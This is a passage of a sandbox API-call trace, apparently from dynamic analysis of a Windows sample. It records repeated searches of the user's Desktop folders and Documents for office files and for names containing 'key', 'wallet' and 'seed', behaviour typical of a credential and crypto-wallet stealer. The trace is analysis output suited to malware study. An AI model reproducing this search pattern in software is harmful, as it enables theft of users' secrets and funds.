lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.135] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.137] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.137] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.138] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.139] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.140] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.141] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.142] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.142] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.144] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.144] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.145] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0217.145] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\\\Desktop\\\\file", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\\\Desktop\\\\file") returned 0x22 [0217.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.146] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.146] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.147] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.148] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.149] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.149] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.151] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.151] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.152] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.153] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.154] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.154] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.156] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.156] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.157] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.157] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.159] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\file", lpFilePart=0x0) returned 0x1f [0217.159] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\file\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.181] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0217.181] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\\\Desktop\\\\New folder", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\\\Desktop\\\\New folder") returned 0x28 [0217.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.181] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.182] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.184] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.185] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.186] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.187] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.189] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.189] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.191] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.191] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.194] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.194] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.196] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.196] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.198] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.199] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.200] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\New folder", lpFilePart=0x0) returned 0x25 [0217.201] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\New folder\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.203] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0217.203] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Documents") returned 0x1d [0217.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.203] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.203] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9aa1e0, ftCreationTime.dwHighDateTime=0x1d7e152, ftLastAccessTime.dwLowDateTime=0xe9959da0, ftLastAccessTime.dwHighDateTime=0x1d7e295, ftLastWriteTime.dwLowDateTime=0xe9959da0, ftLastWriteTime.dwHighDateTime=0x1d7e295, nFileSizeHigh=0x0, nFileSizeLow=0xae0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PZWvtV.pdf", cAlternateFileName="")) returned 0x76a908 [0217.204] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f764a20, ftCreationTime.dwHighDateTime=0x1d7e436, ftLastAccessTime.dwLowDateTime=0x6c77d050, ftLastAccessTime.dwHighDateTime=0x1d7e78f, ftLastWriteTime.dwLowDateTime=0x6c77d050, ftLastWriteTime.dwHighDateTime=0x1d7e78f, nFileSizeHigh=0x0, nFileSizeLow=0x12814, dwReserved0=0x0, dwReserved1=0x0, cFileName="_t2rCPk2APhgTTU.pdf", cAlternateFileName="_T2RCP~1.PDF")) returned 1 [0217.204] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0217.204] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0217.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.205] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, 